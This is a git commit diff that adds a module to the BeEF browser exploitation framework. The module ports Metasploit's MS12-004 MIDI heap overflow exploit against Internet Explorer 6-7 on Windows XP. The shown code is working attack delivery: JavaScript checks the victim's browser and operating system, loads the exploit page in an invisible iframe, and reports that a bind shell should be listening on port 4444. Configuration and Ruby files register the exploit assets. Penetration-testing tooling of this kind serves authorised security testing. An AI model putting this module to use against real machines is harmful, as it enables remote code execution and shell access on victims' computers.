Add 'IE MS12-004 midiOutPlayNextPolyEvent Heap Overflow' exploit module from MSF

2013-12-30 10:59:25 +10:30
parent bece5c1438
commit fe37a14adc
5 changed files with 1206 additions and 0 deletions
--- a/modules/exploits/local_host/ie_ms12_004_midi/command.js
+++ b/modules/exploits/local_host/ie_ms12_004_midi/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  // check browser
+  if (beef.browser.isIE() != 1) {
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Target browser is not Internet Explorer");
+    return
+  }
+
+  // check OS
+  if (beef.os.isWindows() != 1) {
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Target OS is not Windows");
+    return
+  }
+
+  // exploit
+  var url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/ie_ms12_004_midi.html';
+  var timeout = 15;
+  var ie_ms12_004_midi_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ie_ms12_004_midi_iframe_<%= @command_id %>.setAttribute('src', url)
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit attempted. Check for your shell on port 4444");
+
+  // cleanup
+  cleanup = function() {
+    document.body.removeChild(ie_ms12_004_midi_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", timeout*1000);
+
+});
--- a/modules/exploits/local_host/ie_ms12_004_midi/config.yaml
+++ b/modules/exploits/local_host/ie_ms12_004_midi/config.yaml
@@ -0,0 +1,26 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+###
+# This module is a quick, dirty and butchered port of 'modules/exploits/windows/browser/ms12_004_midi.rb'
+# from the Metasploit Framework project. Written originally by Shane Garrett, juan vazquez, and sinn3r
+# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_004_midi.rb
+###
+beef:
+    module:
+        ie_ms12_004_midi:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "IE MS12-004 midiOutPlayNextPolyEvent Heap Overflow"
+            description: "This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files.  Remote code execution can be achieved by using the Windows Media Player ActiveX control.<br/><br/>This exploit has been ported directly from <a href='http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_004_midi.rb'>ms12_004_midi.rb</a> from Metasploit, however it has limited target support (IE 6-7 on WinXP SP3 only) and limited payloads (bind shell on port 4444 only).<br/><br/>For more granular control over browser based Metasploit exploits using BeEF, refer to the <a href='https://github.com/beefproject/beef/wiki/Metasploit' target='_blank'>Metasploit Integration for BeEF</a> page on the wiki."
+            authors: ['Shane Garrett', 'juan vazquez', 'sinn3r']
+            target:
+                working:
+                    IE:
+                        min_ver: 6
+                        max_ver: 7
+                not_working:
+                    ALL:
+                        os: ["ALL"]
--- a/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.html
+++ b/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.html
--- a/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.mid
+++ b/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.mid
--- a/modules/exploits/local_host/ie_ms12_004_midi/module.rb
+++ b/modules/exploits/local_host/ie_ms12_004_midi/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+###
+# This module is a quick, dirty and butchered port of 'modules/exploits/windows/browser/ms12_004_midi.rb'
+# from the Metasploit Framework project. Written originally by Shane Garrett, juan vazquez, and sinn3r
+# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_004_midi.rb
+###
+class Ie_ms12_004_midi < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.html', '/ie_ms12_004_midi', 'html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.mid', '/ie_ms12_004_midi', 'mid')
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+#    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.html')
+#    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.mid')
+  end
+
+end